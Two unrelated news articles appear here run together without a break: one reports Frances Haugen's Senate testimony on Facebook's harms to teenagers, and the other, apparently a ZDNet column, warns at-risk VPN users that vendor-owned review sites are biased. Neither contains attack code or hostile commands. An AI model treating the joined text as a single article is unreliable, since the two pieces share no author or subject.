    The whistleblower whose disclosures became a catalyst for a Senate inquiry into Facebook’s operations has declared the company as “morally bankrupt,” casting “the choices being made inside of Facebook” as “disastrous for our children, our privacy, and our democracy.”

    On Tuesday, US Senator Richard Blumenthal chaired a hearing of the Subcommittee on Consumer Protection, Product Safety, and Data Security, with Facebook whistleblower Frances Haugen as a witness. Blumenthal thanked the whistleblower for her “strength and courage in coming here today.” Haugen, who used to work as the lead product manager for Facebook’s civic misinformation team, told the Senate that Facebook “intentionally hides vital information from the public, the US government, and governments around the world.” The whistleblower also told the Senate members that Facebook “is choosing to grow at all costs” — which means that profits are being “bought with our safety.” This, in turn, is encouraging “more division, more harm, more lies, more threats, [and] more combat” online. “No one truly understands the destructive choices made by Facebook, except for Facebook,” Haugen said.

    Antigone Davis, Facebook Director and Global Head of Safety, appeared at a hearing last week in which the Senate chastised the social media company for failing to do enough to protect younger users, and also accused Facebook of putting profit before safety by hiding the knowledge that the Instagram app causes mental harm.

    The allegations stem from The Facebook Files, a series of investigations posted by The Wall Street Journal. The articles are based on internal files, draft presentations, research, and internal staff communication leaked by the whistleblower. While the reports explore a variety of topics, including Facebook algorithms that made users “angrier” and how the company allegedly does not apply the same terms of service rules to some high-profile users as to the general public, the main thrust of the reports — branded a “bombshell” by Blumenthal — revolved around the ‘toxic’ nature of Facebook’s platform to teenagers, especially young girls. The research in question explores areas including social comparisons, loneliness, anxiety, sadness, and eating issues. The WSJ reports suggest that some teenagers suffering from suicidal thoughts were able to trace them back to Instagram.

    The WSJ published six of the internal documents which were the basis of its investigation. Facebook then published two of them, complete with annotations, last week. Facebook has accused the publication of deliberate mischaracterizations. Davis said, “We strongly disagree with how this reporting characterized our work, so we want to be clear about what that research shows, and what it does not show.” Davis insisted that the internal research did not create “causal relationships between Instagram and real-world issues,” and while Instagram was indicated as a source that could make girls suffering from body image issues feel worse, this was one of numerous topics included in the research — and many teenagers suffering from various problems have a positive experience on Instagram. The latest hearing, titled “Protecting Kids Online: Testimony from a Facebook Whistleblower,” allowed the whistleblower’s testimony to be heard and her experiences working at Facebook to be explored.
    When queried about its use of algorithms and engagement-based rankings to promote specific types of content that could be harmful, Haugen said that “Facebook knows that its amplification algorithms can lead children from innocuous topics — such as healthy food recipes — to anorexia-promoting content over a short period of time.” The whistleblower claims that Facebook has re-created experiments to test out amplification algorithms that could cause this transition from safe to dangerous topics — and so the company “knows” this happens. Haugen added that Facebook CEO Mark Zuckerberg “has built an organization that is very metrics-driven — the metrics make the decision,” and, therefore, “the buck stops with him.”

    Facebook has paused a plan to develop a version of Instagram for kids, citing the need for more time to work more closely with “parents, experts, policymakers and regulators.” Haugen suggested that we could see the platform rolled out in a year, commenting: “Facebook understands that if they want to continue to grow, they have to find new users. The way they’ll do that is to ensure kids establish habits before self-regulation.” When asked if this is what she meant by “hooking kids,” the whistleblower agreed.

    The chair of the committee remained critical of Facebook, saying in today’s hearing that “their profit was more important than the pain that they caused.” Blumenthal also urged Zuckerberg to appear before the Senate. Haugen called for the Senate to act, commenting: “A company with such frightening influence over people […] needs real oversight. However, its closed design means there is no oversight.” “Facebook can change but clearly will not do so on its own,” the whistleblower added. “Congress can change the rules Facebook plays by and can stop the harm Facebook is causing. 
    […] We still have time to act, but we must act now.”

    Davis said last week that Facebook would not “retaliate for them [the whistleblower] coming to the Senate”; however, this does not mean there will not be legal repercussions for sharing corporate documents with the WSJ. Blumenthal acknowledged that the whistleblower came forward at “great personal risk” and said the Senate will do “everything and anything we can to stop retaliation.”

    On September 30, Senators Blumenthal and Edward Markey reintroduced a bill designed to bolster the privacy and security of minors online. The Kids Internet Design and Safety (KIDS) Act, if accepted, is legislation that aims to prevent manipulative marketing, push alerts, ‘like’ and follower functionality, and features that reward those under 16 for spending more time on their devices.

    In other Facebook news, the social media giant experienced a six-hour outage on Monday that also disrupted service for billions of users across Instagram and WhatsApp. Facebook believes the issue was caused by configuration changes that went awry. “We want to make clear at this time we believe the root cause of this outage was a faulty configuration change,” the firm said. “We also have no evidence that user data was compromised as a result of this downtime.”

    Update 18.57 BST: Facebook’s Lena Pietsch, director of policy communications, has issued the following statement: “Today, a Senate Commerce subcommittee held a hearing with a former product manager at Facebook who worked for the company for less than two years, had no direct reports, never attended a decision-point meeting with C-level executives — and testified more than six times to not working on the subject matter in question. We don’t agree with her characterization of the many issues she testified about. Despite all this, we agree on one thing; it’s time to begin to create standard rules for the internet. 
    It’s been 25 years since the rules for the internet have been updated, and instead of expecting the industry to make societal decisions that belong to legislators, it is time for Congress to act.”


    When your VPN is a matter of life or death, don't rely on reviews

    There are VPN users who use VPNs just so they can safely surf the internet from a coffee shop, hotel, or airport. Before the COVID-19 pandemic, I mostly fell into that category. There are VPN users who, as mentioned, mostly use VPNs to spoof their location so they can watch blacked-out sports events or get Star Trek Discovery via Netflix instead of Paramount+.

    And then there are the people I’m writing this article for: the folks for whom VPN usage is a life-or-death thing. These people are citizens in nations with oppressive regimes trying to communicate with the outside world, people who are researching health or sexuality information that could cause them to be discriminated against (or worse), people who are trying to hide their location from abusive partners or stalkers, people who are dissidents (which is not a pejorative, but a word used to describe people who are fighting totalitarian regimes and oppressive government policies), and so on. It’s for these people, whom I’ll call the life-and-deathers, that this article is being written. And if you fit into this category, listen up. What I’m about to say could save your life.

    VPNs (or virtual private networks) generally do a few key things. They encrypt your internet traffic between your computer and a destination on the internet. If you’re using a corporate VPN, it creates a secure tunnel between your machine and your company’s network. VPN services, with familiar names like ExpressVPN, Surfshark, and NordVPN, create secure tunnels between your machine and their servers — but the connection from their servers to whatever destination server you’re accessing is secured only by whatever base protocol you’re using to communicate with that final server. VPN services also purport to hide your IP address from the internet and allow you to spoof your geographical location. This is a service absolutely necessary to those concerned about their safety. Unfortunately, it is a service primarily marketed as a way for users to bypass geographic entertainment restrictions.

    There are ethical and unethical reasons people use VPNs. I’m writing this to help protect ethical users, not to encourage or facilitate unethical use.

    Follow the money

    You may have noticed that VPN reviews are hugely prevalent all over the internet. This is because: (A) there’s a lot of interest in VPNs, especially now that people are working from home more often, and (B) VPN vendors pay so-called objective media outlets to promote them. This is worthy of some detailed discussion. For most of modern history, when a company wanted to promote a product in the media, they’d use one of two mechanisms. They’d either buy ads, or they’d hire a PR firm. The benefit of advertising is that the advertiser has complete control over the message. As long as they can afford to pay for placement, they can say (within reason) whatever they want. Ads are delineated on the page, so consumers can easily tell the difference between them and legitimate reporting. PR is the practice of trying to convince a writer (like me) to write about a product. The benefit (to the vendor) is that PR is generally free. If I choose to write about a product because I think it’s worthy in some way, the vendor isn’t paying for that coverage. But… the vendor also has absolutely no control over what I might say, nor whether or not the product ever gets coverage.

    There is some gray area here. While writers often purchase the items they review, many reviewers receive the things they review for free. Companies want the attention of reviewers and their audiences. Companies can also withhold access, favoring those they know will speak positively or give their products glowing reviews. For example, I never get early access to Apple products because I’ve been critical of the company. Done right, at least historically, marketing has been a mix of good advertising and good PR. But the internet has changed that. It’s now possible to track what people read, what they click on, and what they buy. That technological capability gave rise to a new form of marketing: affiliate marketing. With affiliate marketing, when you click on a link that leads you to buy a product, the seller can see your entire track of interaction. This means the seller can know where you were when you clicked that link. If you click a link on ZDNet and then buy a product on Amazon, Amazon knows that the sale came from an article on ZDNet. If you click on a link on ZDNet (or just about any other website) that has an affiliate code and then buy from Amazon, Amazon also pays a percentage of the sale back to the originating site. The idea is that the affiliate payment encourages sites to cover products. And it works — very, very well. Sites get a lot of revenue (sometimes more than from advertising) from affiliate links. Many sites have full-time affiliate relationship managers who do deals with vendors for a percentage of the sales price — and then encourage editors to write about those products. Done right, there’s no harm in this practice. But what does “done right” mean? Done right means that editorial decisions drive coverage, not business decisions. For example, here at ZDNet, I choose what I want to cover. I get to say what I want to say about a product based on my professional experience. 
    The commerce teams don’t have any input into my objective editorial opinion. If I write a more negative review because readers deserve to be aware of product limitations, no one tells me to hide those limitations. In our case, once I write an article, the affiliate team reads those articles and will sometimes add affiliate links. I have no insight into what deals they have or how much they make. And here’s how that applies to VPNs. I cover a lot of VPN services. I know, generally, that many of the VPN services have affiliate relationships with our commerce team. But I have zero visibility into those deals. As such, I choose the VPNs to cover and what I say entirely based on my editorial judgement. There’s no bias due to business relationships. ZDNet does financially benefit from the fact that I cover VPNs, but not from any specific VPN. But that’s not the case for all online sources of VPN reviews.

    VPN companies who own VPN review sites

    Last week, I discussed ExpressVPN’s week of rough news. One detail: ExpressVPN was bought by Kape Technologies for nearly a billion dollars. That sale price, alone, should show you how much these VPN service companies are raking in. See also: Trust, but verify: An in-depth analysis of ExpressVPN’s terrible, horrible, no good, very bad week. But it’s worse. A year earlier, Kape (which also owns VPN vendors Private Internet Access, CyberGhost, and ZenMate) bought a company called Webselenese. This company owns the VPN review site VPNMentor. So which VPNs does VPNMentor recommend as its best of 2021? Its own: ExpressVPN in first place, CyberGhost in second, and Private Internet Access in third. That’s not suspicious at all (he says sarcastically):
    Source: VPNMentor.com
    How valuable are reviews to VPN companies? Consider how much Kape spent on Webselenese. That amount: $149 million. If you’re going to spend $149 million to control the review conversation, there’s got to be a lot of money at play. But Kape isn’t the only VPN company that owns its own review sites. Let’s spend a moment exploring J2 Global. J2 Global launched in 1995 as the provider of the JFax faxing service. The internet was barely a thing back then, and faxing was big. Over the next decade and a half or so, J2 stayed pretty much in its lane, offering fax services under a variety of brands. Then, in 2012, it started a media acquisitions spree. In 2012, it bought publisher Ziff-Davis. For the record, the ZD in ZDNet harkens back to the Ziff-Davis brand, but ZDNet was spun out as a separate company and hasn’t been affiliated with Ziff-Davis for more than 20 years. In some ways, in fact, we’re now direct competitors. The J2 acquisition of Ziff-Davis bought the company a bunch of very familiar tech publications, including PCMag, Spiceworks, ExtremeTech, IGN, and Mashable. Then, in 2019, J2 scooped up VPN vendors SaferVPN, IPVanish, and StrongVPN. Whereas VPNMentor is clearly biased in its coverage, I have to give it to PCMag.com: of the ten best VPN services it lists on its “best of 2021” page, its parent company does not own one.
    Source: PCMag.com
    Even so, we’ve now identified that many of the top VPNs are owned by the same companies that own the top VPN review sites. Conclusion: If you’re putting your life on the line, you might not want to trust these sites for unbiased reviews.

    What should you do?

    Even unbiased reviews like those I produce aren’t enough to rely upon if you’re a VPN life-and-deather. I put in about a week of testing per VPN, and I test from here in central Oregon. I can’t travel all around the world and test how safe and secure a given VPN service is when used, for example, in the UAE instead of Oregon. For those who haven’t been following along through all my VPN guides, VPN usage in the United Arab Emirates is illegal and could get you sent to jail or fined up to the UAE equivalent of $500,000. While a professional reviewer might be able to provide a relatively comprehensive review of one VPN he or she lives with over the course of a few years, no reviewer is going to be able to spend months of time testing each and every one of an entire set of VPNs. It’s just not practical or possible. So no matter which reviews you read, the test results are going to be limited to what could be practically tested by the reviewer in question. If your life is at stake, these tests are too limited. Period. I’d recommend you dive much deeper into this tool you’re going to be depending on. First, read this excellent guide just recently put out by the NSA and CISA. A lot of it is designed for corporate networks, but the protocol discussion is first-rate. Second, seek out others in your life-and-deather community. Folks who have dealt with the same kind of security challenges and risks will have better experience than some other reviewer who only theoretically walks in your shoes. Read forums. Read user reviews. Read a lot. And, third, get to know how VPNs work on a technical level. Here’s a Digital Ocean article that gets you started running your own VPN server. But don’t stop with just one article. 
If your life is dependent on this technology, learn. Take courses on computer security. Learn everything you can on how data moves on the internet. Coursera, for example, offers free in-depth university-level classes. The only time you have to pay is if you want the credential. But if you’re more concerned about your personal security than your resume, you can learn a tremendous amount and not spend anything. My bottom line for all of this is simple: There are ways you can learn enough to create a safer situation for yourself. Just quickly scanning product reviews tells you very little about the best way to stay alive and safe. You can follow my day-to-day project updates on social media. Be sure to follow me on Twitter at @DavidGewirtz, on Facebook at Facebook.com/DavidGewirtz, on Instagram at Instagram.com/DavidGewirtz, and on YouTube at YouTube.com/DavidGewirtzTV.
